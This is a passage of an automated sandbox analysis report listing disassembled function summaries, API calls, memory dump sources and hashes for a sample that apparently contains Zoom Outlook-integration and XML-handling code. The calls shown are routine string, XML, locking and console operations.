                • ??0CSBMBMessage_OutlookMAPIEventChangeNotify@@QAE@XZ.RWSNDPQSKZ(00000074), ref: 00C5CEE0
                  • Part of subcall function 00C5C7A0: __EH_prolog3.LIBCMT ref: 00C5C7A7
                  • Part of subcall function 00C5C7A0: ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5C7C7
                • ?SetItem2@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z.RWSNDPQSKZ(?,00000074), ref: 00C5CEF4
                  • Part of subcall function 00C5C660: __EH_prolog3.LIBCMT ref: 00C5C667
                • ??1?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@UAE@XZ.RWSNDPQSKZ(00009E66,00000074), ref: 00C5CF17
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$Archive@Cmm@@Cmm@@@MessageTemplate_2@$H_prolog3$??0?$??1?$ChangeEventH00@H_prolog3_Item2@?$Message_Notify@@OutlookW@3@@
                • String ID:
                • API String ID: 3597761791-0
                • Opcode ID: 155d6fcc3560dc128c384b6fdf441a10cbed7713ebc7afe46c802af59941f506
                • Instruction ID: c2da4da40c4b8775473cdc7d487374b7dafdcb29b2bc6ad41d29f9d1d3cb7ae9
                • Opcode Fuzzy Hash: 155d6fcc3560dc128c384b6fdf441a10cbed7713ebc7afe46c802af59941f506
                • Instruction Fuzzy Hash: 79F068356103099BCF04FFA5D8C19AE7765AF54749B004029F805AB152DE70AA89D758
                Function 00CC08A0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CC08A7
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004), ref: 00CC08C0
                  • Part of subcall function 00CC0670: CoCreateGuid.OLE32(?,?), ref: 00CC068B
                  • Part of subcall function 00CC0670: StringFromCLSID.OLE32(?,?), ref: 00CC069A
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D34CD0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 00CC0900
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,00D34CD0,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CC090C
                  • Part of subcall function 00C53EF0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,000000FF,?,00C53DA1,00000000), ref: 00C53F06
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$Cmm@@$Assign@?$$??0?$?erase@?$CreateFromGuidH_prolog3U?$char_traits@_V01@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                • String ID:
                • API String ID: 4030975112-0
                • Opcode ID: 2cf7d28205c5aaea237fdc9ac6b3c6b49787ff5a69efea0eddc904b75c827003
                • Instruction ID: 9773dc8a2ef2ef2af242d1c1213f17c07970faddbc3e67b623bbfc00aca5f171
                • Opcode Fuzzy Hash: 2cf7d28205c5aaea237fdc9ac6b3c6b49787ff5a69efea0eddc904b75c827003
                • Instruction Fuzzy Hash: 21016270A05646EBDB04DF19D64169DF7A0BF04704F50513DE80597B42DBF0AA68DB94
                Function 00CB0BA0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0BB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0BC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0BD1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0BD7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: 5f223344f583dc2ffb69b09d5b366fbd2359efec486d6ae0d88f03cbe9cabba8
                • Instruction ID: 08724cc1670b418dcc7a6c38eee4b74c36cdebdf8af32c931066cce066386bc0
                • Opcode Fuzzy Hash: 5f223344f583dc2ffb69b09d5b366fbd2359efec486d6ae0d88f03cbe9cabba8
                • Instruction Fuzzy Hash: D7E02B367043246B4D006718AC019EF739D9A86378B244125FD55E7342CF20ED0196E4
                Function 00CB0CA0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0CB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0CC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0CD1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0CD7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: e9156c535e40956b7aa566d1bb4b0be3afe1524ea58026d37802e185fea2cff5
                • Instruction ID: 170045bbbef32c116dc2fb5ce2b5e1e6c8905c94ef2b63dd2fec1c88706f37f0
                • Opcode Fuzzy Hash: e9156c535e40956b7aa566d1bb4b0be3afe1524ea58026d37802e185fea2cff5
                • Instruction Fuzzy Hash: FEE02B767003246B4D046A18A8019EF775DAA86374B344365FD11E7342CF21FD0196E5
                Function 00CB0DA0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0DB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0DC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0DD1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0DD7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: ccafcaa3a4cc6c874c562a77e0355aa7769b84cc02b7b1e02bfb218244d00fad
                • Instruction ID: e19f1c98f266b41755c6e3ddd834edb8cb9221547e37d0ca03a5f9c763d5c1a4
                • Opcode Fuzzy Hash: ccafcaa3a4cc6c874c562a77e0355aa7769b84cc02b7b1e02bfb218244d00fad
                • Instruction Fuzzy Hash: 99E02B767013246B4D006668AC019EF779D9B86374B244125FD55E7382CF20FD0196E4
                Function 00CB0EA0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB0EB2
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(7FFFFFFF), ref: 00CB0EC9
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ(00000000,7FFFFFFF), ref: 00CB0ED1
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB0ED7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Node@tinyxml2@@State@Unlock@Value@$Equal@StringUtil@tinyxml2@@
                • String ID:
                • API String ID: 412887391-0
                • Opcode ID: 75cd87c2e2ad1abb385740681c1dbacfa5cabea5024ea73bde443749b2fdab69
                • Instruction ID: e215e2c4f8f4e0ca53bbf12848df2c3a3c29bdeb8ff3aec8e2c8811f6baf2dfa
                • Opcode Fuzzy Hash: 75cd87c2e2ad1abb385740681c1dbacfa5cabea5024ea73bde443749b2fdab69
                • Instruction Fuzzy Hash: 16E02B767003286B4E00A618A8019FF739D9A86374B244125FD95F7342CF21ED0196E5
                Function 00CA63B0 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CA63B7
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004), ref: 00CA63E1
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000004), ref: 00CA63F1
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000004), ref: 00CA6401
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3
                • String ID:
                • API String ID: 709177685-0
                • Opcode ID: d6c4f4ae25b760cfa485be36ea724f0fdd8678430df518c8ad55058c2c81f66f
                • Instruction ID: c73cf6faa20a57734f8e68ba5938f5707346f1dd8d9d2e68a7c97b1890d99e26
                • Opcode Fuzzy Hash: d6c4f4ae25b760cfa485be36ea724f0fdd8678430df518c8ad55058c2c81f66f
                • Instruction Fuzzy Hash: D2011DB5500B05EFC710DF29C480A9AF7F4BF58310B14CA2AE59A83B51DB71F958DB90
                Function 00D0C477 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • WriteConsoleW.KERNEL32(00CF3121,00CE3349,?,00000000,00CF3121,?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121), ref: 00D0C48E
                • GetLastError.KERNEL32(?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000,00CF3121,?,00CF8656,00000010), ref: 00D0C49A
                  • Part of subcall function 00D0C460: CloseHandle.KERNEL32(FFFFFFFE,00D0C4AA,?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000,00CF3121), ref: 00D0C470
                • ___initconout.LIBCMT ref: 00D0C4AA
                  • Part of subcall function 00D0C422: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D0C451,00D038E8,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000), ref: 00D0C435
                • WriteConsoleW.KERNEL32(00CF3121,00CE3349,?,00000000,?,00D038FB,00CF3121,00000001,00CF3121,00CF3121,?,00CF8102,00000000,8304488B,00CF3121,00000000), ref: 00D0C4BF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: 8fae212eceeb0904454f8fb045f535f7ddc3fb08dba880df2d743c248ce061d7
                • Instruction ID: 3eb5c0a38bfc34dbe314b2da2180934fa3fbc6dd37f38b4dc9819f197f8658bc
                • Opcode Fuzzy Hash: 8fae212eceeb0904454f8fb045f535f7ddc3fb08dba880df2d743c248ce061d7
                • Instruction Fuzzy Hash: 83F0F836411219BBCF622FE59C04A993F66FB083A1B048210FA1C85270CB32D821AFB4
                Function 00C781C0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C781C7
                • EnterCriticalSection.KERNEL32(?,00000004), ref: 00C781D9
                • LeaveCriticalSection.KERNEL32(?,?,00000004), ref: 00C781F4
                • ?WakeUp@Channel@ssb_ipc@@QAE_NXZ.RWSNDPQSKZ(?,00000004), ref: 00C781FD
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalSection$Channel@ssb_ipc@@EnterH_prolog3LeaveWake
                • String ID:
                • API String ID: 1677816905-0
                • Opcode ID: 99ff07e9e16d07df1bc77415bcd29fc9b288aa8829948172ccb4138e6c6f5e2b
                • Instruction ID: 7cb71dc2c0ca5e45a28e9dba70be9ddd614ce9d16de22a11280d17cffc3ef211
                • Opcode Fuzzy Hash: 99ff07e9e16d07df1bc77415bcd29fc9b288aa8829948172ccb4138e6c6f5e2b
                • Instruction Fuzzy Hash: 25E09272C02B25A7CB11EF60D80AADEB364BF10B15F408225B91697251CF70AB4ACBF4
                Function 00CB23B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                Download Yara Rule
                APIs
                • ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                • ?DeleteNode@XMLDocument@tinyxml2@@QAEXPAVXMLNode@2@@Z.RWSNDPQSKZ(?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?), ref: 00CB23C4
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: DeleteDocument@tinyxml2@@$Children@Error@Error@2@Node@Node@2@@Node@tinyxml2@@
                • String ID:
                • API String ID: 3736626447-0
                • Opcode ID: a8981787519500fa7e7ded6d387a5145510baadb64124f214804e0b983cace88
                • Instruction ID: 1773fd5c8be59ca6908521f47cdc9f558ed4914d217113ba3dd767ebe87d9d7a
                • Opcode Fuzzy Hash: a8981787519500fa7e7ded6d387a5145510baadb64124f214804e0b983cace88
                • Instruction Fuzzy Hash: 72E04F71500B909BCA316B2B9C05D8BBBE9EFC2750B11086FF44642621DAB5A805EA70
                Function 00CE4E82 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00DFECA0,00DFECA8,?,?,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4E9F
                • LeaveCriticalSection.KERNEL32(00DFECA8,?,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4EAF
                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4EC0
                • EnterCriticalSection.KERNEL32(00DFECA8,?,00CE4E1F,00000064,?,00C62BE7,00DFFC8C), ref: 00CE4EC7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalSection$Cmm@@EnterLeaveObjectSingleState@Unlock@Wait
                • String ID:
                • API String ID: 974333809-0
                • Opcode ID: 89cebacbe2412024e7322f3034f9938b0d6e1e11cf864ef919605c5f860117a9
                • Instruction ID: eb462d94025cdb2063e144313296dced546c8ca3381badf58c9fbb96d34464aa
                • Opcode Fuzzy Hash: 89cebacbe2412024e7322f3034f9938b0d6e1e11cf864ef919605c5f860117a9
                • Instruction Fuzzy Hash: 37E0E532981728BFCA011B52EC19AE9BB2ABF05B52B028410FA05AA370CB7159419BF5
                Function 00C56150 Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C56157
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000024), ref: 00C56169
                • ??Y?$CStringT@D@Cmm@@QAEAAV01@PBD@Z.RWSNDPQSKZ(?,?,00000024), ref: 00C56175
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(00000000,?,00000024), ref: 00C5617D
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
